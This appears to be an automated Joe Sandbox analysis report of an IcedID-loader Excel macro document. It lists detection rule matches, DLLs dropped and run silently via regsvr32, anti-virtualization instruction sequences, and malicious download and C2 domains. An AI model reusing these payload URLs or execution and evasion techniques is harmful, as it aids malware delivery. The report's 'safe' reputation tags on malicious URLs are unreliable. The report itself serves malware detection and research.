        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fml 2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\lsdfik[1].fml 2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
        Source: 6.2.regsvr32.exe.a0000.0.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
        Source: 3.2.regsvr32.exe.110000.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
        Source: 3.2.regsvr32.exe.220000.1.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
        Source: 6.2.regsvr32.exe.a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
        Source: 6.2.regsvr32.exe.1b0000.1.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
        Source: 4.2.regsvr32.exe.190000.0.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
        Source: 3.2.regsvr32.exe.110000.0.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
        Source: 4.2.regsvr32.exe.190000.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
        Source: 4.2.regsvr32.exe.1b0000.1.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
        Source: 00000003.00000002.2102276983.0000000000110000.00000004.00000001.sdmp, type: MEMORYMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
        Source: 00000006.00000002.2118500619.00000000000A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
        Source: 00000004.00000002.2109562092.0000000000190000.00000004.00000001.sdmp, type: MEMORYMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
        Source: regsvr32.exe, 00000003.00000002.2105066388.00000000030F0000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
        Source: classification engineClassification label: mal100.troj.expl.evad.winXLSM@7/8@15/5
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$sbf0127365-7431059.xlsmJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRDA38.tmpJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Windows\System32\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XRAY.dll
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XTOWN.dll
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XZIBIT.dll
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XRAY.dllJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XTOWN.dllJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XZIBIT.dllJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: sbf0127365-7431059.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
        Source: sbf0127365-7431059.xlsmInitial sample: OLE zip file path = xl/media/image1.png
        Source: sbf0127365-7431059.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
        Source: sbf0127365-7431059.xlsmInitial sample: OLE zip file path = xl/calcChain.xml
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
        Source: lsdfik[1].fml.0.drStatic PE information: real checksum: 0x1baf8 should be: 0x19d85
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XRAY.dll
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fmlJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XTOWN.dllJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\lsdfik[1].fmlJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XRAY.dllJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XZIBIT.dllJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\lsdfik[1].fmlJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XTOWN.dllJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XRAY.dllJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XZIBIT.dllJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\lsdfik[1].fmlJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fmlJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\lsdfik[1].fmlJump to dropped file

        Boot Survival:

        barindex
        Drops PE files to the user root directoryShow sources
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XTOWN.dllJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XRAY.dllJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XZIBIT.dllJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion:

        barindex
        Contains functionality to detect hardware virtualization (CPUID execution measurement)Show sources
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00221E50 3_2_00221E50
        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_001B1E50 4_2_001B1E50
        Tries to detect virtualization through RDTSC time measurementsShow sources
        Source: C:\Windows\System32\regsvr32.exeRDTSC instruction interceptor: First address: 0000000000221E71 second address: 0000000000221E96 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec esp 0x0000000a mov eax, eax 0x0000000c xor ecx, ecx 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 mov dword ptr [esp+20h], eax 0x00000019 mov dword ptr [esp+24h], ebx 0x0000001d mov dword ptr [esp+28h], ecx 0x00000021 mov dword ptr [esp+2Ch], edx 0x00000025 rdtsc
        Source: C:\Windows\System32\regsvr32.exeRDTSC instruction interceptor: First address: 0000000000221EAB second address: 0000000000221EB8 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 nop 0x00000007 dec eax 0x00000008 or eax, edx 0x0000000a dec eax 0x0000000b mov ecx, eax 0x0000000d rdtsc
        Source: C:\Windows\System32\regsvr32.exeRDTSC instruction interceptor: First address: 00000000001B1E71 second address: 00000000001B1E96 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec esp 0x0000000a mov eax, eax 0x0000000c xor ecx, ecx 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 mov dword ptr [esp+20h], eax 0x00000019 mov dword ptr [esp+24h], ebx 0x0000001d mov dword ptr [esp+28h], ecx 0x00000021 mov dword ptr [esp+2Ch], edx 0x00000025 rdtsc
        Source: C:\Windows\System32\regsvr32.exeRDTSC instruction interceptor: First address: 00000000001B1EAB second address: 00000000001B1EB8 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 nop 0x00000007 dec eax 0x00000008 or eax, edx 0x0000000a dec eax 0x0000000b mov ecx, eax 0x0000000d rdtsc
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00222434 rdtsc 3_2_00222434
        Source: C:\Windows\System32\regsvr32.exeCode function: GetAdaptersInfo,GetAdaptersInfo,3_2_002227BC
        Source: C:\Windows\System32\regsvr32.exeCode function: GetAdaptersInfo,GetAdaptersInfo,4_2_001B27BC
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fmlJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\lsdfik[1].fmlJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\lsdfik[1].fmlJump to dropped file
        Source: regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpBinary or memory string: <a href="/rds/vmware/?hp=tile&amp;so-exp=below"> <i></i> <span>Amazon RDS on VMware</span> <cite>Automate on-premises database management</cite> </a>
        Source: regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpBinary or memory string: <a href="/vmware/?hp=tile&amp;so-exp=below"> <i></i> <span>VMware Cloud on AWS</span> <cite>Build a hybrid cloud without custom hardware</cite> </a>
        Source: regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpBinary or memory string: <img src="//d1.awsstatic.com/Compute/VMware-Cloud-on-AWS_Icon_64_Squid.b126bc9cff89e6c44c4f5b9775521edd6743c2b8.png" alt="VMware-Cloud-on-AWS_Icon_64_Squid" title="VMware-Cloud-on-AWS_Icon_64_Squid" class="cq-dd-image" />
        Source: regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpBinary or memory string: Migrate and extend VMware environments to the AWS Cloud
        Source: regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpBinary or memory string: <a style="padding-left:20px; padding-bottom:0px; padding-right:45px;" href="/vmware/?hp=tile&amp;tile=hybridsol" target="_blank" rel="noopener">
        Source: regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpBinary or memory string: </figure> <h3 id="VMware_Cloud_on_AWS" class="lb-tiny-align-center lb-txt-none lb-h3 lb-title"> VMware Cloud on AWS</h3>
        Source: regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpBinary or memory string: <a style="padding-left:30px; padding-bottom:0px; padding-right:30px;" href="/vmware/?hp=tile&amp;tile=hybridsol" target="_blank" rel="noopener">
        Source: regsvr32.exe, 00000004.00000003.2105877978.000000000314F000.00000004.00000001.sdmpBinary or memory string: </figure> <h3 id="VMware_Cloud_on_AWS" class="lb-tiny-a
        Source: C:\Windows\System32\regsvr32.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00222434 rdtsc 3_2_00222434

        HIPS / PFW / Operating System Protection Evasion:

        barindex
        System process connects to network (likely due to code injection or exploit)Show sources
        Source: C:\Windows\System32\regsvr32.exeDomain query: astrocycle.download
        Source: C:\Windows\System32\regsvr32.exeDomain query: aws.amazon.com
        Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 13.224.92.73 187Jump to behavior
        Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 172.67.213.115 80Jump to behavior
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_002222DC LookupAccountNameW,3_2_002222DC

        Stealing of Sensitive Information:

        barindex
        Yara detected IcedIDShow sources
        Source: Yara matchFile source: dump.pcap, type: PCAP
        Source: Yara matchFile source: 00000004.00000002.2109666116.000000000034E000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.2118665965.00000000002F7000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.2102390531.0000000000329000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.2109698014.0000000000377000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.2102412669.0000000000347000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.2120636157.0000000003090000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 2808, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 2996, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 3068, type: MEMORY

        Remote Access Functionality:

        barindex
        Yara detected IcedIDShow sources
        Source: Yara matchFile source: dump.pcap, type: PCAP
        Source: Yara matchFile source: 00000004.00000002.2109666116.000000000034E000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.2118665965.00000000002F7000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.2102390531.0000000000329000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.2109698014.0000000000377000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.2102412669.0000000000347000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.2120636157.0000000003090000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 2808, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 2996, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 3068, type: MEMORY

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid AccountsExploitation for Client Execution43Path InterceptionProcess Injection11Masquerading121OS Credential DumpingSecurity Software Discovery211Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer14Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection11Security Account ManagerAccount Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Regsvr321NTDSSystem Owner/User Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol124SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Network Configuration Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncFile and Directory Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Information Discovery22Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 signatures2 2 Behavior Graph ID: 444703 Sample: sbf0127365-7431059.xlsm Startdate: 06/07/2021 Architecture: WINDOWS Score: 100 47 Found malware configuration 2->47 49 Document exploit detected (drops PE files) 2->49 51 Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) 2->51 53 6 other signatures 2->53 6 EXCEL.EXE 53 28 2->6         started        process3 dnsIp4 27 voopeople.fun 104.21.12.122, 49168, 80 CLOUDFLARENETUS United States 6->27 29 uppercilio.fun 104.21.55.83, 49169, 80 CLOUDFLARENETUS United States 6->29 31 thousandsyears.download 172.67.198.51, 49167, 80 CLOUDFLARENETUS United States 6->31 19 C:\Users\user\XZIBIT.dll, PE32+ 6->19 dropped 21 C:\Users\user\XTOWN.dll, PE32+ 6->21 dropped 23 C:\Users\user\XRAY.dll, PE32+ 6->23 dropped 25 3 other malicious files 6->25 dropped 55 Document exploit detected (creates forbidden files) 6->55 57 Document exploit detected (UrlDownloadToFile) 6->57 11 regsvr32.exe 4 6->11         started        15 regsvr32.exe 6->15         started        17 regsvr32.exe 6->17         started        file5 signatures6 process7 dnsIp8 33 astrocycle.download 172.67.213.115, 49171, 49173, 49175 CLOUDFLARENETUS United States 11->33 35 dr49lng3n1n2s.cloudfront.net 13.224.92.73, 443, 49170, 49172 AMAZON-02US United States 11->35 45 2 other IPs or domains 11->45 59 System process connects to network (likely due to code injection or exploit) 11->59 61 Contains functionality to detect hardware virtualization (CPUID execution measurement) 11->61 63 Tries to detect virtualization through RDTSC time measurements 11->63 37 tp.8e49140c2-frontier.amazon.com 15->37 39 aws.amazon.com 15->39 41 tp.8e49140c2-frontier.amazon.com 17->41 43 aws.amazon.com 17->43 signatures9

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        No Antivirus matches

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
        http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
        http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
        http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
        https://www.honeycode.aws/?&amp;trk=el_a134p000003yC6YAAU&amp;trkCampaign=pac-edm-2020-honeycode-hom0%URL Reputationsafe
        https://www.honeycode.aws/?&amp;trk=el_a134p000003yC6YAAU&amp;trkCampaign=pac-edm-2020-honeycode-hom0%URL Reputationsafe
        https://www.honeycode.aws/?&amp;trk=el_a134p000003yC6YAAU&amp;trkCampaign=pac-edm-2020-honeycode-hom0%URL Reputationsafe
        http://ocsp.rootg2.amazontrust.com080%URL Reputationsafe
        http://ocsp.rootg2.amazontrust.com080%URL Reputationsafe
        http://ocsp.rootg2.amazontrust.com080%URL Reputationsafe
        https://www.buzzsprout.com;0%Avira URL Cloudsafe
        http://voopeople.fun/div/44376,8555986111.jpg0%Avira URL Cloudsafe
        http://crl.sca1b.amazontrust.com/sca1b.crl00%URL Reputationsafe
        http://crl.sca1b.amazontrust.com/sca1b.crl00%URL Reputationsafe
        http://crl.sca1b.amazontrust.com/sca1b.crl00%URL Reputationsafe
        http://astrocycle.download/0%Avira URL Cloudsafe
        http://servername/isapibackend.dll0%Avira URL Cloudsafe
        http://ocsp.sca1b.amazontrust.com060%URL Reputationsafe
        http://ocsp.sca1b.amazontrust.com060%URL Reputationsafe
        http://ocsp.sca1b.amazontrust.com060%URL Reputationsafe
        http://crt.rootg2.amazontrust.com/root0%Avira URL Cloudsafe
        http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
        http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
        http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
        http://ocsp.rootca1.amazontrust.com0:0%Avira URL Cloudsafe
        http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
        http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
        http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
        https://prod-us-west-2.csp-report.marketing.aws.dev/submitx-amz-id-1Z10NXV9YPC16ZYC023HEX-Content-Ty0%Avira URL Cloudsafe
        http://astrocycle.download/Q5ZDkxZT0%Avira URL Cloudsafe
        http://crl.rootg2.amazontrust.com/rootg2.crl00%URL Reputationsafe
        http://crl.rootg2.amazontrust.com/rootg2.crl00%URL Reputationsafe
        http://crl.rootg2.amazontrust.com/rootg2.crl00%URL Reputationsafe
        http://uppercilio.fun/div/44376,8555986111.jpg0%Avira URL Cloudsafe
        http://o.ss2.us/00%URL Reputationsafe
        http://o.ss2.us/00%URL Reputationsafe
        http://o.ss2.us/00%URL Reputationsafe
        https://prod-us-west-2.csp-report.marketing.aws.dev/submit0%Avira URL Cloudsafe
        http://thousandsyears.download/div/44376,8555986111.jpg0%Avira URL Cloudsafe
        https://amazonwebservices.d2.sc.omtrdc.net0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        uppercilio.fun
        		104.21.55.83
        		truefalse
          		unknown
          thousandsyears.download
          		172.67.198.51
          		truefalse
            		unknown
            voopeople.fun
            		104.21.12.122
            		truefalse
              		unknown
              astrocycle.download
              		172.67.213.115
              		truetrue
                		unknown
                dr49lng3n1n2s.cloudfront.net
                		13.224.92.73
                		truefalse
                  		high
                  aws.amazon.com
                  		unknown
                  		unknownfalse
                    		high

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://voopeople.fun/div/44376,8555986111.jpgfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://astrocycle.download/true
                    • Avira URL Cloud: safe
                    		unknown
                    http://uppercilio.fun/div/44376,8555986111.jpgfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://thousandsyears.download/div/44376,8555986111.jpgfalse
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://twitter.com/awscloudregsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpfalse
                      		high
                      https://www.linkedin.comregsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpfalse
                        		high
